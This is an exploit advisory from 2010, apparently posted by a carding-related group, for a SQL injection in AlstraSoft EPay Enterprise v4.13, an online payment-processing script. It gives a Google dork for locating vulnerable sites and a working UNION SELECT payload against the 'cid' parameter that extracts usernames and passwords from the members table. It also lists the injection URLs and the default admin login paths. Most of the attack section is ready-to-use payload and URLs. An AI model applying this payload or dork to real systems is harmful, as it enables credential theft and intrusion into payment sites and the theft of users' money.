1 ) ) ) ( ( ( ( ( ) )
2 ( /(( /( ( ( /( ( ( ( )\ ))\ ) )\ ))\ ) )\ ) ( /( ( /(
3 )\())\()))\ ) )\()) )\ )\ )\ (()/(()/( ( (()/(()/((()/( )\()) )\())
4 ((_)((_)\(()/( ((_)((((_)( (((_)(((_)( /(_))(_)) )\ /(_))(_))/(_))(_)\|((_)\
5 __ ((_)((_)/(_))___ ((_)\ _ )\ )\___)\ _ )\(_))(_))_ ((_)(_))(_)) (_)) _((_)_ ((_)
6 \ \ / / _ (_)) __\ \ / (_)_\(_)(/ __(_)_\(_) _ \| \| __| _ \ | |_ _|| \| | |/ /
7 \ V / (_) || (_ |\ V / / _ \ | (__ / _ \ | /| |) | _|| / |__ | | | .‘ | ’ <
8 |_| \___/ \___| |_| /_/ \_\ \___/_/ \_\|_|_\|___/|___|_|_\____|___||_|\_|_|\_\
9
.WEB.ID
10 −−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−
11 EPay Enterprise v4.13 (cid) SQL Injection Vulnerability
12 −−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−
13 Author
: v3n0m
14 Site
: http://yogyacarderlink.web.id/
15 Date
: April, 23−2010
16 Location
: Jakarta, Indonesia
17 Time Zone
: GMT +7:00
18 −−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−
19
20 Affected software description:
21 ~~~~~~~~~~~~~~~~~~~~~~~~~~
22
23 Application
: AlstraSoft EPay Enterprise
24 Vendor
: http://www.alstrasoft.com/
25 Price
: $240 USD
26 Google Dork
: "Powered by EPay Enterprise" inurl:"shop.htm?cid=" inurl:"shop.php?cid="
27 Overview
:
28
29 EPay Enterprise has been developed by AlstraSoft with the growing demand
30 for online payment processing business similar to Paypal and Stormpay.com.
31 −−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−
32
33 Exploit:
34 ~~~~~~~
35
36 −99999+union+all+select+all+null,null,group_concat(username,char(58),password)v3n0m+from+dp_members−−
37
38 SQLi p0c:
39 ~~~~~~~
40
41 http://127.0.0.1/[path]/shop.htm?cid=[SQLi]
42 http://127.0.0.1/[path]/shop.php?cid=[SQLi]
43
44
45 Default Admin Login Page:
46 ~~~~~~~~~~~~~~
47 http://127.0.0.1/[path]/admins/login.php
48 http://127.0.0.1/[path]/admins/login.htm
49 −−−−−−−−−−−